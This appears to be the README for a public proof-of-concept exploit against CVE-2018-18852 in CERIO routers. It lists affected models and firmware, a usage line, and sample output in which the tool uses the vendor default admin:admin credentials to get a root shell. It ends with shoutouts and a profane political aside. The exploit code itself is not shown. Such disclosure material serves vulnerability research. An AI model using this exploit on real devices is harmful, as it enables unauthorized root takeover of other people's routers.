CERIO RCE CVE-2018-18852, authenticated (vendor defaults) web-based RCE as root user.
hook-s3c (github.com/hook-s3c), @hook_s3c on twitter
Working Python PoC for CVE-2018-18852, originally appearing on;
https://github.com/hook-s3c/CVE-2018-18852
CERIO Router models and variants of, DT300N, DT100G, AMR-3204, WMR-200N are
vulnerable to an authenticated web-based RCE as root user.
Exists as an 0day undisclosed advisory;
https://www.fortiguard.com/zeroday/FG-VD-18-149
Vendor default credentials are usually present, so execution is trivial.
Architecture is MIPS.
Usage: exploit.py <ipaddress> <port> <creds>
$ python ./exploit.py 127.0.0.1 8080 admin:admin[*] ================================================[*] CERIO RCE CVE-2018-18852, confirmed on;[*] - CERIO DT-300N-NGS-M - fw: Pme-CPE-AP12X V1.0.3[*] - CERIO DT-300N - fw: Cen-CPE-N2H10A V1.0.14, Cen-CPE-N2H10A V1.1.6, Cen-CPE-N2H10A V1.1.7[*] - CERIO DT-100G-N - fw: Cen-AP-N2H10A V1.0.8[*] - CERIO DT-100G - fw: Cen-WR-G2H5 V1.0.7[*] - CERIO DT-100GX-N - fw: Cen-AP-N2H8A V1.0.18[*] - CERIO AMR-3204G - fw: Cen-AC V2.0.19[*] - CERIO WMR-200N - fw: Cen-HS-N2H1 V1.0.6c Test[*][/] by hook (@hook_s3c) https://github.com/hook-s3c/CVE-2018-18852[/] Greetz to vap0rsquad, ThugCrowd, $noHat$, r0bl0xgang, Udderly Amoosing, illmob,[/] The Many Hats Club, Cyber.Phunk, WAC, SHAM, 0x00sec, John McAfee[/] Go cop YTCracker's Introducing Neals, gov overreach is no joke - wake the fuck up[*] ================================================root@cerio:~# id[!] This may not be the right model (DT-300N-NGS-M), trying again[+] Sucessfully grabbed pid token: 1312uid=0(root) gid=0(root)root@cerio:~#
Shoutout to vap0rsquad, ThugCrowd, $noHat$, r0bl0xgang, Udderly Amoosing, illmob, The Many Hats Club, Cyber.Phunk, WAC, SHAM, 0x00sec, John McAfee
Go cop YTCracker’s Introducing Neals, gov overreach is no joke - wake the fuck up
HTP!!!! YEET